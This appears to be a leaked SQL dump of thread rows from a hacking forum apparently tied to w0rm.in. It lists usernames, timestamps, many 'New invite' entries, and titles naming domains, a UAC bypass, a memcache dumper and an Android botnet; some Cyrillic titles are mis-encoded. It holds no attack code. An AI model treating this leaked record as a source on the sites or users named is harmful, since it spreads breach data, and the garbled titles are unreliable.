(1101, 'https://w0rm.in - тõÑÂтøрþòðýøõ', '', 1173, 1998, 1410528486, 13, 0, 1, 11, 0, 0, 'w0rm', 1, 'lumbricus', 1404240222, 169, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1114, 'new invite', '', 1197, 1197, 1404461560, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404461560, 3, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1113, 'china.cn', '', 1196, 1215, 1404534417, 7, 0, 1, 2, 0, 0, 'Kingbeef', 3, 'Kingbeef', 1404458824, 67, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1111, 'new invite', '', 1194, 1194, 1404450631, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404450631, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1110, 'new invite', '', 1193, 1193, 1404426305, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404426305, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1115, 'new invite', '', 1198, 1198, 1404461645, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404461645, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1116, 'new invite', '', 1199, 1199, 1404467368, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404467368, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1437, '{$name}', '', 1586, 1586, 1407956085, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407956085, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1134, 'фþрüð ÿþôðчø ÷ðÑÂòúø', '', 1223, 1549, 1407831397, 13, 0, 1, 1, 0, 0, 'w0rm', 1, 'w0rm', 1404782723, 46, 0, '', 1, 1, 0, 0, 1, '', NULL),
(1128, '{$name}', '', 1212, 1212, 1404508694, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404508694, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1133, 'New invite', '', 1222, 1222, 1404776933, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404776933, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1450, '{$name}', '', 1615, 1615, 1408180050, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408180050, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1136, 'New invite', '', 1226, 1226, 1404809228, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404809228, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1138, 'AntiDDoS', '', 1228, 1610, 1408125540, 13, 0, 1, 4, 0, 0, 'w0rm', 1, 'w0rm', 1404883312, 55, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1139, 'New invite', '', 1229, 1229, 1404937164, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404937164, 14, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2373, 'cyberbuddha', '', 2836, 2836, 1443123275, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443123275, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2374, 'ematana', '', 2839, 2839, 1443136238, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443136238, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1142, 'cinemablend.com', '', 1233, 1233, 1405026721, 7, 0, 1, 0, 0, 0, 'mb1', 25, 'mb1', 1405026721, 55, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1144, 'New invite', '', 1238, 1238, 1405264488, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405264488, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1143, 'New invite', '', 1235, 1235, 1405100097, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405100097, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1145, '.blackhatworld.com', '', 1239, 2270, 1436321646, 37, 0, 1, 1, 0, 0, 'w0rm', 1, 'Versus71', 1405265072, 525, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1146, 'New invite', '', 1240, 1240, 1405276155, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405276155, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1147, 'New invite', '', 1241, 1241, 1405277915, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405277915, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1148, 'New invite', '', 1242, 1242, 1405324090, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405324090, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1149, 'New invite', '', 1243, 1243, 1405324593, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405324593, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1150, 'New invite', '', 1244, 1244, 1405358185, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405358185, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1152, 'New invite', '', 1247, 1247, 1405462166, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405462166, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1153, 'New invite', '', 1248, 1248, 1405484713, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405484713, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1154, 'New invite', '', 1249, 1249, 1405489446, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405489446, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1155, 'New invite', '', 1250, 1250, 1405489511, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405489511, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1156, 'New invite', '', 1251, 1251, 1405491189, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405491189, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1157, 'New invite', '', 1252, 1252, 1405491266, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405491266, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1158, 'New invite', '', 1253, 1253, 1405491360, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405491360, 3, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1159, 'New invite', '', 1254, 1254, 1405491394, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405491394, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1160, 'New invite', '', 1255, 1255, 1405499640, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405499640, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1161, 'New invite', '', 1256, 1256, 1405499664, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405499664, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1162, 'New invite', '', 1257, 1257, 1405500092, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405500092, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1163, 'New invite', '', 1258, 1258, 1405501156, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405501156, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1164, 'New invite', '', 1259, 1259, 1405506077, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405506077, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1165, 'New invite', '', 1260, 1260, 1405514463, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405514463, 3, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1166, 'New invite', '', 1261, 1261, 1405514521, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405514521, 3, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1167, 'New invite', '', 1262, 1262, 1405519391, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405519391, 3, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1168, 'New invite', '', 1263, 1263, 1405520537, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405520537, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1169, 'New invite', '', 1264, 1264, 1405521353, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405521353, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1170, 'New invite', '', 1265, 1265, 1405521899, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405521899, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1171, 'New invite', '', 1266, 1266, 1405523367, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405523367, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1172, 'New invite', '', 1267, 1267, 1405523382, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405523382, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1173, 'New invite', '', 1268, 1268, 1405523389, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405523389, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1174, 'New invite', '', 1269, 1269, 1405529010, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405529010, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1219, 'New invite', '', 1329, 1329, 1406198023, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406198023, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1176, 'New invite', '', 1272, 1272, 1405531929, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405531929, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1177, 'New invite', '', 1273, 1273, 1405533837, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405533837, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1178, 'New invite', '', 1274, 1274, 1405535637, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405535637, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1179, 'New invite', '', 1275, 1275, 1405536389, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405536389, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1180, 'New invite', '', 1276, 1276, 1405539421, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405539421, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1181, 'New invite', '', 1277, 1277, 1405578947, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405578947, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1182, 'New invite', '', 1278, 1278, 1405593955, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405593955, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1183, 'New invite', '', 1279, 1279, 1405594067, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405594067, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1184, 'New invite', '', 1280, 1280, 1405597398, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405597398, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1185, 'New invite', '', 1281, 1281, 1405598770, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405598770, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1186, 'New invite', '', 1282, 1282, 1405599084, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405599084, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1187, 'New invite', '', 1283, 1283, 1405600909, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405600909, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1189, 'New invite', '', 1285, 1285, 1405625018, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405625018, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1190, 'New invite', '', 1286, 1286, 1405655972, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405655972, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1191, 'New invite', '', 1287, 1287, 1405656157, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405656157, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1192, 'New invite', '', 1288, 1288, 1405663464, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405663464, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1193, 'New invite', '', 1289, 1289, 1405669712, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405669712, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1194, 'New invite', '', 1290, 1290, 1405691651, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405691651, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1195, 'http://raspberry.ws', '', 1293, 1293, 1405707041, 10, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1405707041, 85, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1196, 'proclub.ws', '', 1294, 1294, 1405718951, 37, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1405718951, 366, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1197, 'New invite', '', 1295, 1295, 1405722042, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405722042, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1198, 'New invite', '', 1296, 1296, 1405724295, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405724295, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1199, 'New invite', '', 1297, 1297, 1405749430, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405749430, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1200, 'New invite', '', 1298, 1298, 1405777728, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405777728, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1201, 'New invite', '', 1299, 1299, 1405777762, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405777762, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1202, 'New invite', '', 1300, 1300, 1405777855, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405777855, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1203, 'New invite', '', 1301, 1301, 1405814446, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405814446, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1204, 'New invite', '', 1302, 1302, 1405877994, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405877994, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1205, 'úþýтðúты úþüðýôы.', '', 1303, 1328, 1406186682, 13, 0, 1, 5, 0, 0, 'w0rm', 1, 'Bo0om', 1405879200, 62, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1206, 'úþýфõрõýцøѠw0rm.in', '', 1304, 1354, 1407289075, 13, 0, 1, 3, 0, 0, 'w0rm', 1, 'w0rm', 1405879274, 62, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1207, 'New invite', '', 1307, 1307, 1405945485, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405945485, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1208, 'New invite', '', 1310, 1310, 1405968883, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405968883, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1209, 'New invite', '', 1311, 1311, 1406012552, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406012552, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1210, 'New invite', '', 1312, 1312, 1406031571, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406031571, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1211, 'donbass.ua', '', 1315, 2087, 1411033122, 7, 0, 1, 6, 0, 0, 'Psych0tr1a', 11, '123', 1406059855, 79, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1212, 'New invite', '', 1318, 1318, 1406097812, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406097812, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1213, 'New invite', '', 1319, 1319, 1406118025, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406118025, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1214, 'New invite', '', 1320, 1320, 1406131030, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406131030, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1215, 'New invite', '', 1321, 1321, 1406135903, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406135903, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1216, 'New invite', '', 1322, 1322, 1406136813, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406136813, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1217, 'New invite', '', 1323, 1323, 1406142831, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406142831, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1221, 'New invite', '', 1333, 1333, 1406322468, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406322468, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1220, 'New invite', '', 1332, 1332, 1406262169, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406262169, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1222, 'New invite', '', 1335, 1335, 1406361292, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406361292, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1223, 'New invite', '', 1336, 1336, 1406843333, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406843333, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1224, 'New invite', '', 1339, 1339, 1406874474, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406874474, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1225, 'New invite', '', 1341, 1341, 1406911885, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406911885, 20, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1226, 'New invite', '', 1342, 1364, 1407426191, 2, 0, 1, 1, 0, 0, 'Invite', 2, 'syslink', 1406957329, 15, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1227, 'ukr.net', '', 1343, 1368, 1407430711, 7, 0, 1, 4, 0, 1, 'w0rm', 1, 'w0rm', 1407011062, 71, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1228, 'New invite', '', 1344, 1344, 1407065204, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407065204, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1229, 'New invite', '', 1345, 1345, 1407076981, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407076981, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1230, 'New invite', '', 1347, 1363, 1407426091, 2, 0, 1, 1, 0, 0, 'Invite', 2, 'syslink', 1407135055, 50, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1231, 'webinar.actionpay.ru', '', 1349, 1355, 1407319670, 7, 0, 1, 1, 0, 0, 'null', 9, 'awert', 1407155324, 51, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1232, 'UAC Bypass', '', 1352, 1352, 1407256846, 15, 0, 1, 0, 0, 0, 'syslink', 13, 'syslink', 1407256846, 70, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1233, 'New invite', '', 1353, 1353, 1407269479, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407269479, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1234, 'ßõрõõ÷ô', '', 1369, 1468, 1407520698, 13, 0, 1, 5, 0, 0, 'w0rm', 1, 'w0rm', 1407454152, 41, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1336, 'memache-dumper', '', 1477, 1477, 1407662078, 15, 0, 1, 0, 0, 0, 'syslink', 13, 'syslink', 1407662078, 73, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1235, 'New invite', '', 1371, 1371, 1407456339, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407456339, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1236, 'New invite', '', 1372, 1372, 1407456467, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407456467, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1237, 'New invite', '', 1373, 1373, 1407456553, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407456553, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1238, 'New invite', '', 1375, 1375, 1407459994, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407459994, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1239, 'New invite', '', 1376, 1376, 1407460952, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407460952, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1240, 'New invite', '', 1377, 1377, 1407461248, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407461248, 2, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1241, 'New invite', '', 1378, 1378, 1407461315, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407461315, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1335, 'Android botnet', '', 1476, 2698, 1442097667, 15, 0, 1, 2, 0, 0, 'syslink', 13, 'hunter_exploitkit', 1407661639, 146, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1314, 'New invite', '', 1454, 1454, 1407517045, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517045, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1315, 'New invite', '', 1455, 1455, 1407517220, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517220, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1316, 'New invite', '', 1456, 1456, 1407517231, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517231, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1317, 'New invite', '', 1457, 1457, 1407517654, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517654, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1318, 'New invite', '', 1458, 1458, 1407517680, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517680, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1319, 'New invite', '', 1459, 1459, 1407517693, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517693, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1320, 'New invite', '', 1460, 1460, 1407517746, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517746, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1321, 'New invite', '', 1461, 1461, 1407517755, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517755, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1322, 'New invite', '', 1462, 1462, 1407518217, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407518217, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1323, 'New invite', '', 1463, 1463, 1407518305, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407518305, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1324, 'New invite', '', 1464, 1464, 1407519306, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407519306, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1328, '{$name}', '', 1469, 1469, 1407594801, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407594801, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1329, '{$name}', '', 1470, 1470, 1407611611, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407611611, 3, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1310, 'New invite', '', 1450, 1450, 1407503526, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407503526, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1313, 'New invite', '', 1453, 1453, 1407516189, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407516189, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1325, 'New invite', '', 1465, 1465, 1407519374, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407519374, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1326, 'New invite', '', 1466, 1466, 1407519732, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407519732, 0, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1327, 'New invite', '', 1467, 1467, 1407520443, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407520443, 14, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1330, '{$name}', '', 1471, 1471, 1407613019, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407613019, 1, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1331, '{$name}', '', 1472, 1472, 1407631652, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407631652, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1332, '{$name}', '', 1473, 1473, 1407645723, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407645723, 11, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1333, '{$name}', '', 1474, 1474, 1407650671, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407650671, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1334, '{$name}', '', 1475, 1475, 1407650752, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407650752, 16, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1281, 'New invite', '', 1421, 1421, 1407478239, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407478239, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1337, '{$name}', '', 1478, 1478, 1407666743, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407666743, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1338, '{$name}', '', 1479, 1479, 1407679024, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407679024, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1339, '{$name}', '', 1480, 1480, 1407680096, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407680096, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1340, '{$name}', '', 1481, 1481, 1407693525, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407693525, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1341, '{$name}', '', 1482, 1482, 1407694752, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407694752, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1342, '{$name}', '', 1483, 1483, 1407695253, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407695253, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1343, '{$name}', '', 1484, 1484, 1407698884, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407698884, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1344, '{$name}', '', 1485, 1485, 1407698955, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407698955, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1345, '{$name}', '', 1486, 1486, 1407699098, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407699098, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1346, 'Media', '', 1487, 1490, 1407704532, 13, 0, 1, 1, 0, 0, 'syslink', 13, 'syslink', 1407700395, 39, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1347, '{$name}', '', 1488, 1488, 1407700460, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407700460, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1348, '{$name}', '', 1489, 1489, 1407700542, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407700542, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1349, '{$name}', '', 1491, 1491, 1407704759, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407704759, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1350, '{$name}', '', 1492, 1492, 1407705004, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407705004, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1351, '{$name}', '', 1493, 1493, 1407706766, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407706766, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1352, '{$name}', '', 1494, 1494, 1407707519, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407707519, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1353, '{$name}', '', 1495, 1495, 1407710881, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407710881, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
